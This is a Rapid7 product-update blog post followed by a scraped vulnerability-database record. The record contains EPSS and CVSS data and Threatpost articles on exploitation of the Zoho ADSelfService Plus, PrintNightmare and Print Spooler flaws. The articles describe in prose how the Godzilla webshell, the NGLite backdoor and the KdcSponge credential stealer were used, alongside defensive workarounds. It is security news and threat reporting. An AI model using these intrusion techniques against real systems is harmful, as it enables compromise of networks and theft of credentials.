
In today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.
## Apple Silicon support on the Insight Agent
We're excited to announce that the Insight Agent now natively supports Apple Silicon chips!
Apple announced the first generation Apple Silicon chip — the M1 processor — in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.
The new Mac installer built specifically for Apple Silicon can be downloaded directly from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).

## Asset and Vulnerability Details reports
This new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the **Export to PDF** button on the Vulnerability Details page, and you'll have a PDF ready to share!

This is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.
Jane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.
Moreover, while undertaking this effort, another team member — Bill — finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.
## Snyk integration for reporting vulnerabilities
Container Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.
## Emergent threat coverage recap
Q3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed "[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)", presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in [Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.
Other notable emergent threats included:
* [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)
* [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)
* [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)
* [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)
* [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)
* [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)
## Stay tuned!
As always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.
"CVE-2021-1675", "epss": "0.968880000", "percentile": "0.994750000", "modified": "2023-03-17"}, {"cve": "CVE-2021-22005", "epss": "0.974180000", "percentile": "0.998570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26084", "epss": "0.974760000", "percentile": "0.999340000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34527", "epss": "0.970380000", "percentile": "0.995570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-35211", "epss": "0.956020000", "percentile": "0.989720000", "modified": "2023-03-17"}, {"cve": "CVE-2021-35464", "epss": "0.974220000", "percentile": "0.998650000", "modified": "2023-03-17"}, {"cve": "CVE-2021-36934", "epss": "0.001050000", "percentile": "0.411730000", "modified": "2023-03-17"}, {"cve": "CVE-2021-40539", "epss": "0.975260000", "percentile": "0.999760000", "modified": "2023-03-17"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1660004461, "score": 1698843382, "epss": 1679134186}, "_internal": {"score_hash": "6cc72f399f42ce7476dd3b3d25c7f842"}}
{"threatpost": [{"lastseen": "2021-11-09T14:12:34", "description": "A new campaign is prying apart a known security vulnerability in the Zoho ManageEngine ADSelfService Plus password manager, researchers warned over the weekend. The threat actors have managed to exploit the Zoho weakness in at least nine global entities across critical sectors so far (technology, defense, healthcare, energy and education), deploying the Godzilla webshell and exfiltrating data.\n\nOn Sunday, Palo Alto Network\u2019s Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) that the targeted cyberespionage campaign is distinct from the ones that the FBI and [CISA warned about](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September.\n\nThe bug is a critical authentication bypass flaw \u2013 CVE-2021-40539 \u2013 that allows unauthenticated remote code execution (RCE). Zoho [patched](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) the vulnerability in September, but it\u2019s been actively exploited in the wild starting at least as early as August when it was a zero-day, opening the corporate doors to attackers who can run amok as they get free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nConsequences of a successful exploit can be significant: The Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) platform for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. 
It is, in other words, a powerful, highly privileged application that can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\nCISA\u2019s alert explained that in the earlier attacks, state-backed, advanced persistent threats (APTs) were deploying a specific webshell and other techniques to maintain persistence in victim environments.\n\nNine days after the CISA alert, Unit 42 researchers saw yet another, unrelated campaign kick off starting on Sept. 17, as a different actor started scanning for unpatched servers. On Sept. 22, after five days of harvesting data on potential targets, exploitation attempts started up and likely continued into early October.\n\nUnit 42 researchers believe that the actor more or less indiscriminately targeted unpatched servers across the spectrum, from education to the Department of Defense, with scans of at least 370 Zoho ManageEngine servers in the U.S. alone.\n\n\u201cWhile we lack insight into the totality of organizations that were exploited during this campaign, we believe that, globally, at least nine entities across the technology, defense, healthcare, energy and education industries were compromised.\u201d they said.\n\n## Godzilla Webshell Does Some Heavy Lifting\n\nUnit 42 said that after threat actors exploited [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) to gain RCE, they quickly moved laterally to deploy several pieces of malware, relying particularly on the publicly available Godzilla webshell.\n\nThe actor uploaded several Godzilla variations to compromised servers and planted some new malware tools as well, including a custom Golang-based open-source backdoor called [NGLite](<https://github.com/Maka8ka/NGLite>) and a new credential-stealer that Unit 42 is tracking as KdcSponge.\n\n\u201cThe threat actors then used either the webshell or the NGLite payload to run commands and move laterally to other systems on 
the network, while they exfiltrated files of interest simply by downloading them from the web server,\u201d according to the analysis. After the actors pivoted to a domain controller, they installed the new KdcSponge stealer, which is designed to harvest usernames and passwords from domain controllers as accounts attempt to authenticate to the domain via Kerberos.\n\nBoth Godzilla and NGLite are written in Chinese and are free for the taking on GitHub.\n\n\u201cWe believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks,\u201d Unit 42 surmised. The researchers described Godzilla as something of a multi-function pocket knife of a webshell, noting that it \u201cparses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response.\u201d\n\nAs such, attackers can refrain from inflicting targeted systems with code that\u2019s likely to be flagged as malicious until they\u2019re ready to dynamically execute it, researchers said.\n\n## Using NKN to Communicate Is an Eye-Opener\n\n\u201cNGLite is characterized by its author as an \u2018anonymous cross-platform remote control program based on blockchain technology,'\u201d Unit 42 researchers Robert Falcone, Jeff White and Peter Renals explained. 
\u201cIt leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\u201d\n\nThe researchers noted that using NKN \u2013 a legitimate networking service that uses blockchain technology to support a decentralized network of peers \u2013 for a C2 channel is \u201cvery uncommon.\u201d\n\n\u201cWe have seen only 13 samples communicating with NKN altogether \u2013 nine NGLite samples and four related to a legitimate open-source utility called [Surge](<https://github.com/rule110-io/surge>) that uses NKN for file sharing.\u201d\n\n## Threat Actor Shares TTPs with Emissary Panda\n\nUnit 42 said the identity of the threat actor is unclear, but researchers saw [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of Threat Group 3390 (aka [Emissary Panda](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>), APT27, Bronze Union and LuckyMouse), an APT that\u2019s been around since 2013 and which [is believed to operate from China](<https://threatpost.com/bronze-union-apt-updates-remote-access-trojans-in-fresh-wave-of-attacks/142219/>).\n\n\u201cSpecifically, as documented by SecureWorks in an article on a [previous TG-3390 operation](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>), we can see that TG-3390 similarly used web exploitation and another popular Chinese webshell called [ChinaChopper](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) for their initial footholds before leveraging legitimate stolen credentials for lateral movement and attacks on a domain controller,\u201d Unit 42 said. 
\u201cWhile the webshells and exploits differ, once the actors achieved access into the environment, we noted an overlap in some of their exfiltration tooling.\u201d\n\n110921 08:51 UPDATE: [Microsoft said](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) on Monday that it\u2019s attributing this campaign with high confidence to DEV-0322, a group operating out of China, \u201cbased on observed infrastructure, victimology, tactics, and procedures.\u201d\n\nMicrosoft\u2019s Threat Intelligence Center (MSTIC) has previously detected DEV-0322 taking part in attacks targeting the SolarWinds Serv-U software, which had a zero day \u2013 CVE-2021-35211, a remote memory escape \u2013 that SolarWinds [patched](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in July.\n\nMSTIC researchers said that the attacks in this new round of beating up Zoho password manager are installing a custom IIS module. IIS, or Internet Information Services, is an extensible web server software created by Microsoft for use with the Windows NT family.\n\nBesides the custom IIS module, DEV-0322 also deployed a trojan that MSTIC is calling Trojan:Win64/Zebracon that uses hardcoded credentials to make connections to suspected DEV-0322-compromised [Zimbra email servers.](<https://threatpost.com/zimbra-server-bugs-email-plundering/168188/>)\n\nIn its Sept. 
16 alert, CISA recommended that organizations that spot indicators of compromise related to ManageEngine ADSelfService Plus should \u201ctake action immediately.\u201d\n\nAlso, CISA strongly recommended domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets, \u201cif any indication is found that the NTDS.dit file was compromised.\u201d\n\n## Classic Cyberespionage Targets: Healthcare and Energy\n\nIf the actor behind this second Zoho-focused campaign does turn out to be a Chinese APT, it won\u2019t be surprising, some said. Dave Klein, cyber evangelist and director at [Cymulate](<https://cymulate.com/>), pointed to the People\u2019s Republic of China (PRC) having a well-documented, continued interest in healthcare and energy infrastructure data.\n\nHe pointed to the [2015 breach](<https://threatpost.com/5-6-million-fingerprints-stolen-in-opm-hack/114784/>) of the U.S. Office of Personnel Management (OPM) as an example. The massive breach was overwhelmingly [attributed](<https://www.washingtonpost.com/world/national-security/chinese-hackers-breach-federal-governments-personnel-office/2015/06/04/889c0e52-0af7-11e5-95fd-d580f1c5d44e_story.html?hpid=z1>) to the PRC. It included exquisitely sensitive information, including millions of federal employees\u2019 fingerprints, Social Security numbers, dates of birth, employee performance records, employment history, employment benefits, resumes, school transcripts, military service documentation and psychological data from interviews conducted by background investigators.\n\n\u201cThe PRC got into clearance background information data including very sensitive information. 
Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threatpost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were subsequently breached, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and ManageEngine are ripe fruit for threat actors to pluck. Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. 
If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost on Tues., Nov. 16 at 2 p.m. ET for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d a LIVE, interactive conversation with Eric Kaiser, Uptycs\u2019 senior security engineer, about how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com_**](<mailto:becky.bracken@threatpost.com>)**_._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", "title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T07:53:10", "description": "Microsoft has released an emergency patch for the PrintNightmare, a set of two critical remote code-execution (RCE) vulnerabilities in the Windows Print Spooler service that hackers can use to take over an infected system. However, more fixes are necessary before all Windows systems affected by the bug are completely protected, according to the federal government.\n\nMicrosoft on Tuesday released an [out-of-band update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for several versions of Windows to address [CVE-2021-34527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527>), the second of two bugs that were initially thought to be one flaw and which have been dubbed PrintNightmare by security researchers.\n\nHowever, the latest fix only appears to address the RCE variants of PrintNightmare, and not the local privilege escalation (LPE) variant, according to an [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>) by the Cybersecurity Infrastructure and Security Administration (CISA), citing a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) published by the CERT Coordination Center (CERT/CC).\n\nMoreover, the updates do not include Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, which will be patched at a later date, according to CERT/CC.\n\n## **A Tale of Two Vulnerabilities**\n\nThe PrintNightmare saga [began last Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) when a proof-of-concept (PoC) exploit for the 
vulnerability \u2014 at that time tracked as CVE-2021-1675 \u2014 was dropped on GitHub showing how an attacker can exploit the vulnerability to take control of an affected system. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform.\n\nThe response to the situation soon turned into confusion. Though Microsoft released a [patch for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), addressing what it thought was a minor EoP vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, it soon became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. CERT/CC on Thursday offered its own workaround for PrintNightmare, advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. 
CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\n## **Microsoft Issues Incomplete Patch**\n\nThe fix released this week addresses CVE-2021-34527, and includes protections for CVE-2021-1675, according to the CISA, which is encouraging users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\nBut as noted, it won\u2019t fix all systems.\n\nSo, in cases where a system is not protected by the patch, Microsoft is offering several workarounds for PrintNightmare. One is very similar to the federal government\u2019s solution from last week: To stop and disable the Print Spooler service \u2014 and thus the ability to print both locally and remotely \u2014 by using the following PowerShell commands: Stop-Service -Name Spooler -Force and Set-Service -Name Spooler -StartupType Disabled.\n\nThe second workaround is to disable inbound remote printing through Group Policy by disabling the \u201cAllow Print Spooler to accept client connections\u201d policy to block remote attacks, and then restarting the system. In this case, the system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nAnother potential option to prevent remote exploitation of the bug that has worked in \u201climited testing\u201d is to block both the RPC Endpoint Mapper (135/tcp) and SMB (139/tcp and 445/tcp) at the firewall level, according to CERT/CC. 
However, \u201cblocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server,\u201d the center advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T10:55:02", "type": "threatpost", "title": "Microsoft Releases Emergency Patch for PrintNightmare Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T10:55:02", "id": "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "href": "https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. 
The issue affects builds 6113 and below (the fixed version is 6114).\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. 
The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. 
Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like AD SelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho AD SelfService Plus is Vulnerable\n\nUsers can tell if they\u2019ve been affected by taking a gander at the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that users will find the following files in the ADSelfService Plus installation folder if running a vulnerable version:\n\n * cer in \\ManageEngine\\ADSelfService Plus\\bin folder.\n * jsp in \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. 
**[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", 
"CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-19T16:25:33", "description": "Microsoft has warned of yet another vulnerability that\u2019s been discovered in its Windows Print Spooler that can allow attackers to elevate privilege to gain full user rights to a system. The advisory comes on the heels of patching two other remote code-execution (RCE) bugs found in the print service that collectively became known as PrintNightmare.\n\nThe company released [the advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) late Thursday for the latest bug, a Windows Print Spooler elevation-of-privilege vulnerability tracked as [CVE-2021-34481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34481>). Microsoft credited Dragos vulnerability researcher Jacob Baines for identifying the issue.\n\nThe vulnerability \u201cexists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttackers who successfully exploit the bug can run arbitrary code with SYSTEM privileges, allowing them to install programs, view, change or delete data, or create new accounts with full user rights, the company said.\n\nTo work around the bug, administrators and users should stop and disable the Print Spooler service, Microsoft said.\n\n## **Slightly Less of a \u2018PrintNightmare\u2019**\n\nThe vulnerability is the latest in a flurry of problems discovered in Windows Print Spooler, but seems slightly less dangerous, as it can only be exploited locally. 
